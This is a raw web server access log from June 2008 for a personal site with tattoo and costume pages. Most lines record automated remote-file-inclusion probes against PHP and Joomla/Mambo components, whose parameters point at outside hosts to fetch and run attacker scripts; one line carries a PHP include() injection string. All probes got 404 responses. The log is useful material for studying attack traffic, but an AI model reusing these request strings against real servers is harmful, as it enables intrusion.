217.167.194.105 - - [25/Jun/2008:22:35:32 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:35:38 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:43:27 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:43:28 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:43:32 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:43:33 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.111.176.84 - - [25/Jun/2008:22:45:43 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.111.176.84 - - [25/Jun/2008:22:45:43 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
202.43.35.133 - - [25/Jun/2008:22:48:50 -0500] "GET /logs/all%22.php?basedir=%22http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
202.43.35.133 - - [25/Jun/2008:22:48:51 -0500] "GET /all%22.php?basedir=%22http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
65.98.70.18 - - [25/Jun/2008:22:55:35 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
65.98.70.18 - - [25/Jun/2008:22:55:35 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
65.214.44.28 - - [25/Jun/2008:23:00:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [25/Jun/2008:23:00:39 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [25/Jun/2008:23:00:40 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
75.127.104.11 - - [25/Jun/2008:23:02:50 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
75.127.104.11 - - [25/Jun/2008:23:02:50 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
201.55.48.7 - - [25/Jun/2008:23:03:03 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:23:03:04 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:23:03:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:23:03:11 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
74.6.8.113 - - [25/Jun/2008:23:03:30 -0500] "GET /logs/access_log.1207785600 HTTP/1.0" 200 208700 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.93.48.162 - - [25/Jun/2008:23:03:45 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 297 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:45 -0500] "GET /logs//mcf.php?content=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 297 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:45 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 292 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:45 -0500] "GET //mcf.php?content=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 292 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:52 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:52 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:52 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:23:03:53 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
61.70.204.99 - - [25/Jun/2008:23:04:25 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:04:25 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:04:25 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:04:25 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
217.167.194.105 - - [25/Jun/2008:23:07:19 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
81.192.48.40 - - [25/Jun/2008:23:07:27 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.167.194.105 - - [25/Jun/2008:23:07:33 -0500] "GET /logs/errors.php?error=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:23:07:34 -0500] "GET /errors.php?error=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.55.208.131 - - [25/Jun/2008:23:08:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [25/Jun/2008:23:08:35 -0500] "GET /logs/access_log.1206835200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [25/Jun/2008:23:08:36 -0500] "GET /logs/access_log.1195776000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [25/Jun/2008:23:08:36 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
38.99.44.104 - - [25/Jun/2008:23:14:45 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html) One-time, weeklong image crawl"
83.149.95.15 - - [25/Jun/2008:23:15:26 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
83.149.95.15 - - [25/Jun/2008:23:15:26 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
82.194.73.130 - - [25/Jun/2008:23:15:40 -0500] "GET /logs/index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:23:15:40 -0500] "GET /index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
61.63.1.134 - - [25/Jun/2008:23:19:30 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
61.63.1.134 - - [25/Jun/2008:23:19:31 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
201.55.48.7 - - [25/Jun/2008:23:19:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:23:19:32 -0500] "GET //Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:23:19:51 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
201.55.48.7 - - [25/Jun/2008:23:19:52 -0500] "GET //Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
211.20.85.150 - - [25/Jun/2008:23:20:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
74.6.8.113 - - [25/Jun/2008:23:20:50 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.204.97.53 - - [25/Jun/2008:23:20:51 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.800"
203.204.97.53 - - [25/Jun/2008:23:20:52 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.800"
201.55.48.7 - - [25/Jun/2008:23:21:49 -0500] "GET //Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
81.192.48.40 - - [25/Jun/2008:23:25:23 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:23:25:58 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
61.70.204.99 - - [25/Jun/2008:23:27:33 -0500] "GET /logs//logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:27:34 -0500] "GET //logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:27:42 -0500] "GET /logs//logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:27:43 -0500] "GET //logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.54.42.146 - - [25/Jun/2008:23:27:56 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
74.54.42.146 - - [25/Jun/2008:23:27:56 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
74.54.42.146 - - [25/Jun/2008:23:27:56 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
74.54.42.146 - - [25/Jun/2008:23:27:56 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
201.130.79.38 - - [25/Jun/2008:23:31:08 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
201.130.79.38 - - [25/Jun/2008:23:31:08 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
212.111.204.40 - - [25/Jun/2008:23:31:31 -0500] "GET //com_joomlalib/standalone/stubjambo.php?baseDir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
72.29.75.39 - - [25/Jun/2008:23:31:59 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:23:31:59 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
212.111.204.40 - - [25/Jun/2008:23:32:22 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
212.111.204.40 - - [25/Jun/2008:23:32:23 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.194.73.130 - - [25/Jun/2008:23:35:32 -0500] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:23:35:32 -0500] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
61.70.204.99 - - [25/Jun/2008:23:35:37 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:35:37 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.29.75.39 - - [25/Jun/2008:23:35:42 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:23:35:42 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
61.70.204.99 - - [25/Jun/2008:23:35:48 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.70.204.99 - - [25/Jun/2008:23:35:49 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.218.141.5 - - [25/Jun/2008:23:35:55 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cilux.coolpage.biz/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
213.218.141.5 - - [25/Jun/2008:23:35:55 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cilux.coolpage.biz/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
72.29.75.39 - - [25/Jun/2008:23:35:58 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:23:35:58 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
65.214.45.167 - - [25/Jun/2008:23:37:48 -0500] "GET /tattoo/tatd1.JPG HTTP/1.0" 200 14507 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
217.148.95.147 - - [25/Jun/2008:23:38:19 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:23:38:19 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
212.111.204.40 - - [25/Jun/2008:23:39:48 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
212.111.204.40 - - [25/Jun/2008:23:39:48 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:23:40:51 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:23:40:55 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.218.141.5 - - [25/Jun/2008:23:40:56 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
213.218.141.5 - - [25/Jun/2008:23:40:57 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
82.194.73.130 - - [25/Jun/2008:23:41:46 -0500] "GET /logs/index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:23:41:46 -0500] "GET /index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
212.111.204.40 - - [25/Jun/2008:23:41:47 -0500] "GET /logs//com_joomlalib/standalone/stubjambo.php?baseDir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.111.204.40 - - [25/Jun/2008:23:41:47 -0500] "GET //com_joomlalib/standalone/stubjambo.php?baseDir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
72.29.73.67 - - [25/Jun/2008:23:41:57 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:23:41:57 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:23:48:21 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:23:48:21 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.148.95.147 - - [25/Jun/2008:23:48:25 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:23:48:25 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
65.55.208.119 - - [25/Jun/2008:23:48:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [25/Jun/2008:23:48:27 -0500] "GET /logs/access_log.1167523200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.194.73.130 - - [25/Jun/2008:23:48:43 -0500] "GET /logs/index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:23:48:43 -0500] "GET /index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
74.6.8.113 - - [25/Jun/2008:23:50:13 -0500] "GET /logs/access_log.1196812800 HTTP/1.0" 200 189068 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
71.240.209.142 - - [25/Jun/2008:23:56:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:03 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:03 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:03 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:04 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:09 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:10 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:15 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
